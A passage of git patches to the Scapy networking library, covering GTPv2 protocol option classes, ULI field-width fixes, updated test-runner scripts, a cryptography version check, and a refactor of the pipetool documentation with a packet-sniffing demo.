PCO_QoS_Flow_Descriptions_With_Support_Indicator(PCO_Option): + name = "PCO QoS Flow Descriptions With Support Indicator" + fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), + ByteField("length", 0), + PacketListField("Options", None, PCO_option_dispatcher, + length_from=len_options)] + + +class PCO_S_Nssai(PCO_Option): + name = "PCO S-NSSAI" + fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), + ByteField("length", 0), + PacketListField("Options", None, PCO_option_dispatcher, + length_from=len_options)] + + +class PCO_Qos_Rules(PCO_Option): + name = "PCO QoS Rules" + fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), + ByteField("length", 0), + PacketListField("Options", None, PCO_option_dispatcher, + length_from=len_options)] + + +class PCO_Session_AMBR(PCO_Option): + name = "PCO Session AMBR" + fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), + ByteField("length", 0), + PacketListField("Options", None, PCO_option_dispatcher, + length_from=len_options)] + + +class PCO_QoS_Flow_Descriptions(PCO_Option): + name = "PCO QoS Flow Descriptions" + fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), + ByteField("length", 0), + PacketListField("Options", None, PCO_option_dispatcher, + length_from=len_options)] + + class PCO_IPCP(PCO_Option): name = "PCO Internet Protocol Control Protocol" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), @@ -1086,12 +1177,22 @@ class PCO_ChallengeHandshakeAuthenticationProtocol(PCO_Option): PCO_PROTOCOL_CLASSES = { 0x0001: PCO_P_CSCF_IPv6_Address_Request, + 0x0002: PCO_IM_CN_Subsystem_Signaling_Flag, 0x0003: PCO_DNS_Server_IPv6, 0x0005: PCO_SOF, 0x000a: PCO_IP_Allocation_via_NAS, 0x000c: PCO_P_CSCF_IPv4_Address_Request, 0x000d: PCO_DNS_Server_IPv4, 0x0010: PCO_IPv4_Link_MTU_Request, + 0x0012: PCO_P_CSCF_Re_selection_Support, + 0x001a: PCO_PDU_Session_Id, + 0x0022: PCO_5GSM_Cause_Value, + 0x0023: PCO_QoS_Rules_With_Support_Indicator, + 0x0024: PCO_QoS_Flow_Descriptions_With_Support_Indicator, + 0x001b: PCO_S_Nssai, + 0x001c: PCO_Qos_Rules, + 0x001d: PCO_Session_AMBR, + 0x001f: PCO_QoS_Flow_Descriptions, 0x8021: PCO_IPCP, 0xc023: PCO_PasswordAuthentificationProtocol, 0xc223: PCO_ChallengeHandshakeAuthenticationProtocol, @@ -1120,6 +1221,21 @@ class IE_PCO(gtp.IE_Base): length_from=lambda pkt: pkt.length - 1)] +class IE_EPCO(gtp.IE_Base): + name = "IE Extended Protocol Configuration Options" + fields_desc = [ByteEnumField("ietype", 197, IEType), + FieldLenField("length", None, length_of="length", + adjust=lambda pkt, x: len(pkt.payload) + + 4, fmt="H"), + BitField("CR_flag", 0, 4), + BitField("instance", 0, 4), + BitField("Extension", 0, 1), + BitField("SPARE", 0, 4), + BitField("PPP", 0, 3), + PacketListField("Protocols", None, PCO_protocol_dispatcher, + length_from=lambda pkt: pkt.length - 1)] + + class IE_PAA(gtp.IE_Base): name = "IE PAA" fields_desc = [ByteEnumField("ietype", 79, IEType), @@ -1336,6 +1452,7 @@ def extract_padding(self, s): 145: IE_UCI, 161: IE_MMBR, 172: IE_Ran_Nas_Cause, + 197: IE_EPCO, 202: IE_UPF_SelInd_Flags, 255: IE_PrivateExtension} From 4ff5ca471db81f43360ff3b17864b316408f093d Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Fri, 1 May 2020 16:49:40 -0400 Subject: [PATCH 0121/1632] Fix broken ULI fields --- scapy/contrib/gtp_v2.py | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index 3d148edb45a..0e57e2e8932 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -345,8 +345,8 @@ class ULI_CGI(ULI_Field): fields_desc = [ gtp.TBCDByteField("MCC", "", 2), gtp.TBCDByteField("MNC", "", 1), - BitField("LAC", 0, 4), - BitField("CI", 0, 28), + BitField("LAC", 0, 16), + BitField("CI", 0, 16), ] @@ -355,8 +355,8 @@ class ULI_SAI(ULI_Field): fields_desc = [ gtp.TBCDByteField("MCC", "", 2), gtp.TBCDByteField("MNC", "", 1), - ShortField("LAC", 0), - ShortField("SAC", 0), + BitField("LAC", 0, 16), + BitField("SAC", 0, 16), ] @@ -367,8 +367,8 @@ class ULI_RAI(ULI_Field): # MNC: if the third digit of MCC is 0xf, then the length of # MNC is 1 byte gtp.TBCDByteField("MNC", "", 1), - ShortField("LAC", 0), - ShortField("RAC", 0), + BitField("LAC", 0, 16), + BitField("RAC", 0, 16), ] @@ -377,7 +377,7 @@ class ULI_TAI(ULI_Field): fields_desc = [ gtp.TBCDByteField("MCC", "", 2), gtp.TBCDByteField("MNC", "", 1), - ShortField("TAC", 0), + BitField("TAC", 0, 16), ] @@ -396,7 +396,7 @@ class ULI_LAI(ULI_Field): fields_desc = [ gtp.TBCDByteField("MCC", "", 2), gtp.TBCDByteField("MNC", "", 1), - ShortField("LAC", 0), + BitField("LAC", 0, 16), ] From 9e8e79ca9d8b3d58ec4e2d819303a767d8dc4515 Mon Sep 17 00:00:00 2001 From: gpotter Date: Sat, 2 May 2020 14:07:47 +0200 Subject: [PATCH 0122/1632] Upgrade run_tests --- test/run_tests | 26 +++++++++++++++++++------- test/run_tests.bat | 17 +++++++++++++++++ test/run_tests_py2 | 3 --- test/run_tests_py2.bat | 11 ----------- test/run_tests_py3 | 3 --- test/run_tests_py3.bat | 11 ----------- 6 files changed, 36 insertions(+), 35 deletions(-) create mode 100644 test/run_tests.bat delete mode 100755 test/run_tests_py2 delete mode 100644 test/run_tests_py2.bat delete mode 100755 test/run_tests_py3 delete mode 100644 test/run_tests_py3.bat diff --git a/test/run_tests b/test/run_tests index 067c80b654a..cc2f57d215e 100755 --- a/test/run_tests +++ b/test/run_tests @@ -1,10 +1,22 @@ #! /bin/sh -DIR=$(dirname $0)/.. -PYTHON=${PYTHON:-python3} -PYTHONDONTWRITEBYTECODE="True" -if [ -z "$*" ] +DIR=$(dirname "$0")/.. +if [ -z "$PYTHON" ] then - PYTHONPATH=$DIR exec $PYTHON ${DIR}/scapy/tools/UTscapy.py -t regression.uts -f html -K ipv6 -l -o /tmp/scapy_regression_test_$(date +%Y%m%d-%H%M%S).html -else - PYTHONPATH=$DIR exec $PYTHON ${DIR}/scapy/tools/UTscapy.py "$@" + ARGS=$(getopt 23 "$*" 2> /dev/null) + for arg in $ARGS + do + case $arg + in + -2) PYTHON=python2; shift;; + -3) PYTHON=python3; shift;; + --) PYTHON=python3; break;; + esac + done fi +$PYTHON --version > /dev/null 2>&1 +if [ ! $? -eq 0 ] +then + echo "WARNING: '$PYTHON' not found, using 'python' instead." + PYTHON=python +fi +PYTHONPATH=$DIR exec "$PYTHON" ${DIR}/scapy/tools/UTscapy.py "$@" diff --git a/test/run_tests.bat b/test/run_tests.bat new file mode 100644 index 00000000000..db6826c7a7e --- /dev/null +++ b/test/run_tests.bat @@ -0,0 +1,17 @@ +@echo off +set MYDIR=%~dp0.. +set PWD=%MYDIR% +set PYTHONPATH=%MYDIR% +REM shift will not work with %* +set "_args=%*" +IF "%1" == "--2" ( + set PYTHON=python + set "_args=%_args:~3%" +) ELSE IF "%1" == "--3" ( + set PYTHON=python3 + set "_args=%_args:~3%" +) +IF "%PYTHON%" == "" set PYTHON=python3 +WHERE %PYTHON% >nul 2>&1 +IF %ERRORLEVEL% NEQ 0 set PYTHON=python +%PYTHON% "%MYDIR%\scapy\tools\UTscapy.py" %_args% \ No newline at end of file diff --git a/test/run_tests_py2 b/test/run_tests_py2 deleted file mode 100755 index 0ad4b40a0e4..00000000000 --- a/test/run_tests_py2 +++ /dev/null @@ -1,3 +0,0 @@ -#! /bin/sh -PYTHON=python2 -. $(dirname $0)/run_tests "$@" diff --git a/test/run_tests_py2.bat b/test/run_tests_py2.bat deleted file mode 100644 index 2c29eb72a23..00000000000 --- a/test/run_tests_py2.bat +++ /dev/null @@ -1,11 +0,0 @@ -@echo off -title UTscapy - All tests - PY2 -set MYDIR=%~dp0.. -set PWD=%MYDIR% -set PYTHONPATH=%MYDIR% -set PYTHONDONTWRITEBYTECODE=True -if [%1]==[] ( - python "%MYDIR%\scapy\tools\UTscapy.py" -c configs\\windows2.utsc -b -o scapy_regression_test_%date:~6,4%_%date:~3,2%_%date:~0,2%.html -) else ( - python "%MYDIR%\scapy\tools\UTscapy.py" %* -) diff --git a/test/run_tests_py3 b/test/run_tests_py3 deleted file mode 100755 index 3fe3b8a6e97..00000000000 --- a/test/run_tests_py3 +++ /dev/null @@ -1,3 +0,0 @@ -#! /bin/sh -PYTHON=python3 -. $(dirname $0)/run_tests "$@" diff --git a/test/run_tests_py3.bat b/test/run_tests_py3.bat deleted file mode 100644 index 56049075aab..00000000000 --- a/test/run_tests_py3.bat +++ /dev/null @@ -1,11 +0,0 @@ -@echo off -title UTscapy - All tests - PY3 -set MYDIR=%~dp0.. -set PWD=%MYDIR% -set PYTHONPATH=%MYDIR% -set PYTHONDONTWRITEBYTECODE=True -if [%1]==[] ( - python3 "%MYDIR%\scapy\tools\UTscapy.py" -c configs\\windows2.utsc -o scapy_py3_regression_test_%date:~6,4%_%date:~3,2%_%date:~0,2%.html -) else ( - python3 "%MYDIR%\scapy\tools\UTscapy.py" %* -) From 0993ce8909172b91dc8615c0934d618164c110a1 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sat, 2 May 2020 17:31:01 +0200 Subject: [PATCH 0123/1632] Check if cryptography >= 2.0.0 is available --- scapy/config.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/config.py b/scapy/config.py index 6ecc82ac060..fbb7ec14f03 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -378,14 +378,14 @@ def _version_checker(module, minver): def isCryptographyValid(): """ - Check if the cryptography module >= 1.7 is present. This is the minimum + Check if the cryptography module >= 2.0.0 is present. This is the minimum version for most usages in Scapy. """ try: import cryptography except ImportError: return False - return _version_checker(cryptography, (1, 7)) + return _version_checker(cryptography, (2, 0, 0)) def isCryptographyAdvanced(): From 44e0ea3b76cc3a3d2aa047e89abd402a57a24ded Mon Sep 17 00:00:00 2001 From: gpotter Date: Sun, 26 Apr 2020 19:39:33 +0200 Subject: [PATCH 0124/1632] Refactor pipetools doc --- doc/scapy/advanced_usage.rst | 383 ++++++++++----------------- doc/scapy/graphics/pipetool_demo.svg | 43 +++ scapy/automaton.py | 25 +- scapy/pipetool.py | 70 ++++- scapy/scapypipes.py | 68 ++++- scapy/utils.py | 21 +- test/pipetool.uts | 8 +- 7 files changed, 336 insertions(+), 282 deletions(-) create mode 100644 doc/scapy/graphics/pipetool_demo.svg diff --git a/doc/scapy/advanced_usage.rst b/doc/scapy/advanced_usage.rst index c7e6ad012a2..4609adbbbb3 100644 --- a/doc/scapy/advanced_usage.rst +++ b/doc/scapy/advanced_usage.rst @@ -803,6 +803,35 @@ Pipetool is a smart piping system allowing to perform complex stream data manage .. note:: Pipetool default objects are located inside ``scapy.pipetool`` +Demo: sniff, anonymize, send to Wireshark +----------------------------------------- + +The following code will sniff packets on the default interface, anonymize the source and destination IP addresses and pipe it all into Wireshark. Useful when posting online examples, for instance. + +.. code-block:: python3 + + source = SniffSource(iface=conf.iface) + wire = WiresharkSink() + def transf(pkt): + if not pkt or IP not in pkt: + return pkt + pkt[IP].src = "1.1.1.1" + pkt[IP].dst = "2.2.2.2" + return pkt + + source > TransformDrain(transf) > wire + p = PipeEngine(source) + p.start() + p.wait_and_stop() + +The engine is pretty straightforward: + +.. image:: graphics/pipetool_demo.svg + +Let's run it: + +.. image:: https://scapy.net/files/doc/pipetool_demo.gif + Class Types ----------- @@ -812,7 +841,7 @@ There are 3 different class of objects used for data management: - ``Drains`` - ``Sinks`` -They are executed and handled by a ``PipeEngine`` object. +They are executed and handled by a :class:`~scapy.pipetool.PipeEngine` object. When running, a pipetool engine waits for any available data from the Source, and send it in the Drains linked to it. The data then goes from Drains to Drains until it arrives in a Sink, the final state of this data. @@ -823,40 +852,46 @@ Here is a basic demo of what the PipeTool system can do For instance, this engine was generated with this code: ->>> s = CLIFeeder() ->>> s2 = CLIHighFeeder() ->>> d1 = Drain() ->>> d2 = TransformDrain(lambda x: x[::-1]) ->>> si1 = ConsoleSink() ->>> si2 = QueueSink() ->>> ->>> s > d1 ->>> d1 > si1 ->>> d1 > si2 ->>> ->>> s2 >> d1 ->>> d1 >> d2 ->>> d2 >> si1 ->>> ->>> p = PipeEngine() ->>> p.add(s) ->>> p.add(s2) ->>> p.graph(target="> the_above_image.png") +.. code:: pycon + + >>> s = CLIFeeder() + >>> s2 = CLIHighFeeder() + >>> d1 = Drain() + >>> d2 = TransformDrain(lambda x: x[::-1]) + >>> si1 = ConsoleSink() + >>> si2 = QueueSink() + >>> + >>> s > d1 + >>> d1 > si1 + >>> d1 > si2 + >>> + >>> s2 >> d1 + >>> d1 >> d2 + >>> d2 >> si1 + >>> + >>> p = PipeEngine() + >>> p.add(s) + >>> p.add(s2) + >>> p.graph(target="> the_above_image.png") Let's start our PipeEngine: ->>> p.start() +.. code:: pycon + + >>> p.start() Now, let's play with it: ->>> s.send("foo") ->'foo' ->>> s2.send("bar") ->>'rab' ->>> s.send("i like potato") ->'i like potato' ->>> print(si2.recv(), ":", si2.recv()) -foo : i like potato +.. code:: pycon + + >>> s.send("foo") + >'foo' + >>> s2.send("bar") + >>'rab' + >>> s.send("i like potato") + >'i like potato' + >>> print(si2.recv(), ":", si2.recv()) + foo : i like potato Let's study what happens here: @@ -867,17 +902,19 @@ Let's study what happens here: Most of the sinks receive from both lower and upper canals. This is verifiable using the `help(ConsoleSink)` ->>> help(ConsoleSink) -Help on class ConsoleSink in module scapy.pipetool: -class ConsoleSink(Sink) - | Print messages on low and high entries - | +-------+ - | >>-|--. |->> - | | print | - | >-|--' |-> - | +-------+ - | - [...] +.. code:: pycon + + >>> help(ConsoleSink) + Help on class ConsoleSink in module scapy.pipetool: + class ConsoleSink(Sink) + | Print messages on low and high entries + | +-------+ + | >>-|--. |->> + | | print | + | >-|--' |-> + | +-------+ + | + [...] Sources @@ -893,24 +930,28 @@ Default Source classes For any of those class, have a look at ``help([theclass])`` to get more information or the required parameters. -- CLIFeeder : a source especially used in interactive software. its ``send(data)`` generates the event data on the lower canal -- CLIHighFeeder : same than CLIFeeder, but writes on the higher canal -- PeriodicSource : Generate messages periodically on the low canal. -- AutoSource: the default source, that must be extended to create custom sources. +- :class:`~scapy.pipetool.CLIFeeder` : a source especially used in interactive software. its ``send(data)`` generates the event data on the lower canal +- :class:`~scapy.pipetool.CLIHighFeeder` : same than CLIFeeder, but writes on the higher canal +- :class:`~scapy.pipetool.PeriodicSource` : Generate messages periodically on the low canal. +- :class:`~scapy.pipetool.AutoSource`: the default source, that must be extended to create custom sources. Create a custom Source ~~~~~~~~~~~~~~~~~~~~~~ -To create a custom source, one must extend the ``AutoSource`` class. +To create a custom source, one must extend the :class:`~scapy.pipetool.AutoSource` class. -Do NOT use the default ``Source`` class except if you are really sure of what you are doing: it is only used internally, and is missing some implementation. The ``AutoSource`` is made to be used. +.. note:: + + Do NOT use the default :class:`~scapy.pipetool.Source` class except if you are really sure of what you are doing: it is only used internally, and is missing some implementation. The :class:`~scapy.pipetool.AutoSource` is made to be used. To send data through it, the object must call its ``self._gen_data(msg)`` or ``self._gen_high_data(msg)`` functions, which send the data into the PipeEngine. -The Source should also (if possible), set ``self.is_exhausted`` to ``True`` when empty, to allow the clean stop of the ``PipeEngine``. If the source is infinite, it will need a force-stop (see PipeEngine below) +The Source should also (if possible), set ``self.is_exhausted`` to ``True`` when empty, to allow the clean stop of the :class:`~scapy.pipetool.PipeEngine`. If the source is infinite, it will need a force-stop (see PipeEngine below) -For instance, here is how CLIHighFeeder is implemented:: +For instance, here is how :class:`~scapy.pipetool.CLIHighFeeder` is implemented: + +.. code:: python3 class CLIFeeder(CLIFeeder): def send(self, msg): @@ -927,21 +968,21 @@ Default Drain classes Drains need to be linked on the entry that you are using. It can be either on the lower one (using ``>``) or the upper one (using ``>>``). See the basic example above. -- Drain : the most basic Drain possible. Will pass on both low and high entry if linked properly. -- TransformDrain : Apply a function to messages on low and high entry -- UpDrain : Repeat messages from low entry to high exit -- DownDrain : Repeat messages from high entry to low exit +- :class:`~scapy.pipetool.Drain` : the most basic Drain possible. Will pass on both low and high entry if linked properly. +- :class:`~scapy.pipetool.TransformDrain` : Apply a function to messages on low and high entry +- :class:`~scapy.pipetool.UpDrain` : Repeat messages from low entry to high exit +- :class:`~scapy.pipetool.DownDrain` : Repeat messages from high entry to low exit Create a custom Drain ~~~~~~~~~~~~~~~~~~~~~ -To create a custom drain, one must extend the ``Drain`` class. +To create a custom drain, one must extend the :class:`~scapy.pipetool.Drain` class. -A ``Drain`` object will receive data from the lower canal in its ``push`` method, and from the higher canal from its ``high_push`` method. +A :class:`~scapy.pipetool.Drain` object will receive data from the lower canal in its ``push`` method, and from the higher canal from its ``high_push`` method. To send the data back into the next linked Drain / Sink, it must call the ``self._send(msg)`` or ``self._high_send(msg)`` methods. -For instance, here is how TransformDrain is implemented:: +For instance, here is how :class:`~scapy.pipetool.TransformDrain` is implemented:: class TransformDrain(Drain): def __init__(self, f, name=None): @@ -957,161 +998,27 @@ Sinks Sinks are destinations for messages. -A :py:class:`Sink` receives data like a :py:class:`Drain`, but doesn't send any +A :py:class:`~scapy.pipetool.Sink` receives data like a :py:class:`~scapy.pipetool.Drain`, but doesn't send any messages after it. -Messages on the low entry come from :py:meth:`~Sink.push`, and messages on the -high entry come from :py:meth:`~Sink.high_push`. - -Default Sink classes -~~~~~~~~~~~~~~~~~~~~ - -.. py:class:: Sink - - Does nothing; interface to extend for custom sinks. - - All sinks have the following constructor parameters: - - :param name: a human-readable name for the element - :type name: str - - All sinks should implement at least one of these methods: - - .. py:method:: push - - Called by :py:class:`PipeEngine` when there is a new message for the - low entry. - - :param msg: The message data - :returns: None - :rtype: None - - .. py:method:: high_push - - Called by :py:class:`PipeEngine` when there is a new message for the - high entry. - - :param msg: The message data - :returns: None - :rtype: None - -.. py:class:: ConsoleSink - - Prints messages on the low and high entries to ``stdout``. - -.. py:class:: RawConsoleSink - - Prints messages on the low and high entries, using :py:func:`os.write`. - - :param newlines: Include a new-line character after printing each packet. - Defaults to True. - :type newlines: bool - -.. py:class:: TermSink +Messages on the low entry come from :py:meth:`~scapy.pipetool.Sink.push`, and messages on the +high entry come from :py:meth:`~scapy.pipetool.Sink.high_push`. - Prints messages on the low and high entries, on a separate terminal (xterm - or cmd). - - :param keepterm: Leaves the terminal window open after :py:meth:`~Pipe.stop` - is called. Defaults to True. - :type keepterm: bool - :param newlines: Include a new-line character after printing each packet. - Defaults to True. - :type newlines: bool - :param openearly: Automatically starts the terminal when the constructor is - called, rather than waiting for :py:meth:`~Pipe.start`. - Defaults to True. - :type openearly: bool - -.. py:class:: QueueSink - - Collects messages on the low and high entries into a :py:class:`Queue`. - - Messages are dequeued with :py:meth:`recv`. - - Both high and low entries share the same :py:class:`Queue`. - - .. py:method:: recv - - Reads the next message from the queue. - - If no message is available in the queue, returns None. - - :param block: Blocks execution until a packet is available in the queue. - Defaults to True. - :type block: bool - :param timeout: Controls how long to wait if ``block=True``. If None - (the default), this method will wait forever. If a - non-negative number, this is a number of seconds to - wait before giving up (and returning None). - :type timeout: None, int or float - -.. py:class:: WiresharkSink - - Streams :py:class:`Packet` from the low entry to Wireshark. - - Packets are written into a ``pcap`` stream (like :py:class:`WrpcapSink`), - and streamed to a new Wireshark process on its ``stdin``. - - Wireshark is run with the ``-ki -`` arguments, which cause it to treat - ``stdin`` as a capture device. Arguments in :py:attr:`args` will be - appended after this. - - Extends :py:mod:`WrpcapSink`. - - :param linktype: See :py:attr:`WrpcapSink.linktype`. - :type linktype: None or int - :param args: See :py:attr:`args`. - :type args: None or list[str] - - .. py:attribute:: args - - Additional arguments for the Wireshark process. - - This must be either ``None`` (the default), or a ``list`` of ``str``. - - This attribute has no effect after calling :py:meth:`PipeEngine.start`. - - See :manpage:`wireshark(1)` for more details. - -.. py:class:: WrpcapSink - - Writes :py:class:`Packet` on the low entry to a ``pcap`` file. - - Ignores all messages on the high entry. - - .. note:: - - Due to limitations of the ``pcap`` format, all packets **must** be of - the same link type. This class will not mutate packets to conform with - the expected link type. - - :param fname: Filename to write packets to. - :type fname: str - :param linktype: See :py:attr:`linktype`. - :type linktype: None or int - - .. py:attribute:: linktype - - Set an explicit link-type (``DLT_``) for packets. This must be an - ``int`` or ``None``. - - This is the same as the :py:func:`wrpcap` ``linktype`` parameter. - - If ``None`` (the default), the linktype will be auto-detected on the - first packet. This field will *not* be updated with the result of this - auto-detection. - - This attribute has no effect after calling :py:meth:`PipeEngine.start`. +Default Sinks classes +~~~~~~~~~~~~~~~~~~~~~ +- :class:`~scapy.pipetool.ConsoleSink` : Print messages on low and high entries to ``stdout`` +- :class:`~scapy.pipetool.RawConsoleSink` : Print messages on low and high entries, using os.write +- :class:`~scapy.pipetool.TermSink` : Prints messages on the low and high entries, on a separate terminal +- :class:`~scapy.pipetool.QueueSink` : Collects messages on the low and high entries into a :py:class:`Queue` Create a custom Sink ~~~~~~~~~~~~~~~~~~~~ -To create a custom sink, one must extend :py:class:`Sink` and implement -:py:meth:`~Sink.push` and/or :py:meth:`~Sink.high_push`. +To create a custom sink, one must extend :py:class:`~scapy.pipetool.Sink` and implement +:py:meth:`~scapy.pipetool.Sink.push` and/or :py:meth:`~scapy.pipetool.Sink.high_push`. -This is a simplified version of :py:class:`ConsoleSink`: +This is a simplified version of :py:class:`~scapy.pipetool.ConsoleSink`: .. code-block:: python3 @@ -1149,11 +1056,11 @@ This wouldn't link the high entries, so something like this would do nothing: >>> a2 >> b >>> a2.send("hello") -Because ``b`` (:py:class:`Drain`) and ``c`` (:py:class:`ConsoleSink`) are not +Because ``b`` (:py:class:`~scapy.pipetool.Drain`) and ``c`` (:py:class:`scapy.pipetool.ConsoleSink`) are not linked on the high entry. -However, using a :py:class:`DownDrain` would bring the high messages from -:py:class:`CLIHighFeeder` to the lower channel: +However, using a :py:class:`~scapy.pipetool.DownDrain` would bring the high messages from +:py:class:`~scapy.pipetool.CLIHighFeeder` to the lower channel: .. code-block:: pycon @@ -1166,14 +1073,14 @@ However, using a :py:class:`DownDrain` would bring the high messages from The PipeEngine class -------------------- -The ``PipeEngine`` class is the core class of the Pipetool system. It must be initialized and passed the list of all Sources. +The :class:`~scapy.pipetool.PipeEngine` class is the core class of the Pipetool system. It must be initialized and passed the list of all Sources. There are two ways of passing sources: - during initialization: ``p = PipeEngine(source1, source2, ...)`` - using the ``add(source)`` method -A ``PipeEngine`` class must be started with ``.start()`` function. It may be force-stopped with the ``.stop()``, or cleanly stopped with ``.wait_and_stop()`` +A :class:`~scapy.pipetool.PipeEngine` class must be started with ``.start()`` function. It may be force-stopped with the ``.stop()``, or cleanly stopped with ``.wait_and_stop()`` A clean stop only works if the Sources is exhausted (has no data to send left). @@ -1186,14 +1093,14 @@ Scapy advanced PipeTool objects Now that you know the default PipeTool objects, here are some more advanced ones, based on packet functionalities. -- SniffSource : Read packets from an interface and send them to low exit. -- RdpcapSource : Read packets from a PCAP file send them to low exit. -- InjectSink : Packets received on low input are injected (sent) to an interface -- WrpcapSink : Packets received on low input are written to PCAP file -- UDPDrain : UDP payloads received on high entry are sent over UDP (complicated, have a look at ``help(UDPDrain)``) -- FDSourceSink : Use a file descriptor as source and sink -- TCPConnectPipe : TCP connect to addr:port and use it as source and sink -- TCPListenPipe : TCP listen on [addr:]port and use the first connection as source and sink (complicated, have a look at ``help(TCPListenPipe)``) +- :class:`~scapy.scapypipes.SniffSource` : Read packets from an interface and send them to low exit. +- :class:`~scapy.scapypipes.RdpcapSource` : Read packets from a PCAP file send them to low exit. +- :class:`~scapy.scapypipes.InjectSink` : Packets received on low input are injected (sent) to an interface +- :class:`~scapy.scapypipes.WrpcapSink` : Packets received on low input are written to PCAP file +- :class:`~scapy.scapypipes.UDPDrain` : UDP payloads received on high entry are sent over UDP (complicated, have a look at ``help(UDPDrain)``) +- :class:`~scapy.scapypipes.FDSourceSink` : Use a file descriptor as source and sink +- :class:`~scapy.scapypipes.TCPConnectPipe`: TCP connect to addr:port and use it as source and sink +- :class:`~scapy.scapypipes.TCPListenPipe` : TCP listen on [addr:]port and use the first connection as source and sink (complicated, have a look at ``help(TCPListenPipe)``) Triggering ---------- @@ -1202,29 +1109,31 @@ Some special sort of Drains exists: the Trigger Drains. Trigger Drains are special drains, that on receiving data not only pass it by but also send a "Trigger" input, that is received and handled by the next triggered drain (if it exists). -For example, here is a basic TriggerDrain usage: - ->>> a = CLIFeeder() ->>> d = TriggerDrain(lambda msg: True) # Pass messages and trigger when a condition is met ->>> d2 = TriggeredValve() ->>> s = ConsoleSink() ->>> a > d > d2 > s ->>> d ^ d2 # Link the triggers ->>> p = PipeEngine(s) ->>> p.start() -INFO: Pipe engine thread started. ->>> ->>> a.send("this will be printed") ->'this will be printed' ->>> a.send("this won't, because the valve was switched") ->>> a.send("this will, because the valve was switched again") ->'this will, because the valve was switched again' ->>> p.stop() +For example, here is a basic :class:`~scapy.scapypipes.TriggerDrain` usage: + +.. code:: pycon + + >>> a = CLIFeeder() + >>> d = TriggerDrain(lambda msg: True) # Pass messages and trigger when a condition is met + >>> d2 = TriggeredValve() + >>> s = ConsoleSink() + >>> a > d > d2 > s + >>> d ^ d2 # Link the triggers + >>> p = PipeEngine(s) + >>> p.start() + INFO: Pipe engine thread started. + >>> + >>> a.send("this will be printed") + >'this will be printed' + >>> a.send("this won't, because the valve was switched") + >>> a.send("this will, because the valve was switched again") + >'this will, because the valve was switched again' + >>> p.stop() Several triggering Drains exist, they are pretty explicit. It is highly recommended to check the doc using ``help([the class])`` -- TriggeredMessage : Send a preloaded message when triggered and trigger in chain -- TriggerDrain : Pass messages and trigger when a condition is met -- TriggeredValve : Let messages alternatively pass or not, changing on trigger -- TriggeredQueueingValve : Let messages alternatively pass or queued, changing on trigger -- TriggeredSwitch : Let messages alternatively high or low, changing on trigger +- :class:`~scapy.scapypipes.TriggeredMessage` : Send a preloaded message when triggered and trigger in chain +- :class:`~scapy.scapypipes.TriggerDrain` : Pass messages and trigger when a condition is met +- :class:`~scapy.scapypipes.TriggeredValve` : Let messages alternatively pass or not, changing on trigger +- :class:`~scapy.scapypipes.TriggeredQueueingValve` : Let messages alternatively pass or queued, changing on trigger +- :class:`~scapy.scapypipes.TriggeredSwitch` : Let messages alternatively high or low, changing on trigger diff --git a/doc/scapy/graphics/pipetool_demo.svg b/doc/scapy/graphics/pipetool_demo.svg new file mode 100644 index 00000000000..04d84ee6538 --- /dev/null +++ b/doc/scapy/graphics/pipetool_demo.svg @@ -0,0 +1,43 @@ + + + + + + +pipe + + + +2518161510704 + +TransformDrain + + + +2518161510896 + +WiresharkSink + + + +2518161510704->2518161510896 + + + + + +2518161510992 + +SniffSource + + + +2518161510992->2518161510704 + + + + + diff --git a/scapy/automaton.py b/scapy/automaton.py index f1ed3ee87ea..be1e6fdbee1 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -27,11 +27,6 @@ from scapy.consts import WINDOWS import scapy.modules.six as six -if WINDOWS: - from scapy.error import Scapy_Exception - recv_error = Scapy_Exception -else: - recv_error = () """ In Windows, select.select is not available for custom objects. Here's the implementation of scapy to re-create this functionality # noqa: E501 # Passive way: using no-ressources locks @@ -924,18 +919,14 @@ def _do_iter(self): if fd == self.cmdin: yield self.CommandMessage("Received command message") # noqa: E501 elif fd == self.listen_sock: - try: - pkt = self.listen_sock.recv(MTU) - except recv_error: - pass - else: - if pkt is not None: - if self.master_filter(pkt): - self.debug(3, "RECVD: %s" % pkt.summary()) # noqa: E501 - for rcvcond in self.recv_conditions[self.state.state]: # noqa: E501 - self._run_condition(rcvcond, pkt, *state_output) # noqa: E501 - else: - self.debug(4, "FILTR: %s" % pkt.summary()) # noqa: E501 + pkt = self.listen_sock.recv(MTU) + if pkt is not None: + if self.master_filter(pkt): + self.debug(3, "RECVD: %s" % pkt.summary()) # noqa: E501 + for rcvcond in self.recv_conditions[self.state.state]: # noqa: E501 + self._run_condition(rcvcond, pkt, *state_output) # noqa: E501 + else: + self.debug(4, "FILTR: %s" % pkt.summary()) # noqa: E501 else: self.debug(3, "IOEVENT on %s" % fd.ioname) for ioevt in self.ioevents[self.state.state]: diff --git a/scapy/pipetool.py b/scapy/pipetool.py index 5c08e4b6964..af160dcaa7b 100644 --- a/scapy/pipetool.py +++ b/scapy/pipetool.py @@ -379,10 +379,34 @@ def stop(self): class Sink(Pipe): + """ + Does nothing; interface to extend for custom sinks. + + All sinks have the following constructor parameters: + + :param name: a human-readable name for the element + :type name: str + """ def push(self, msg): + """ + Called by :py:class:`PipeEngine` when there is a new message for the + low entry. + + :param msg: The message data + :returns: None + :rtype: None + """ pass def high_push(self, msg): + """ + Called by :py:class:`PipeEngine` when there is a new message for the + high entry. + + :param msg: The message data + :returns: None + :rtype: None + """ pass def start(self): @@ -447,7 +471,7 @@ def stop(self): class ConsoleSink(Sink): - """Print messages on low and high entries: + """Print messages on low and high entries to ``stdout`` .. code:: @@ -466,7 +490,7 @@ def high_push(self, msg): class RawConsoleSink(Sink): - """Print messages on low and high entries, using os.write: + """Print messages on low and high entries, using os.write .. code:: @@ -475,6 +499,10 @@ class RawConsoleSink(Sink): | write | >-|--' |-> +-------+ + + :param newlines: Include a new-line character after printing each 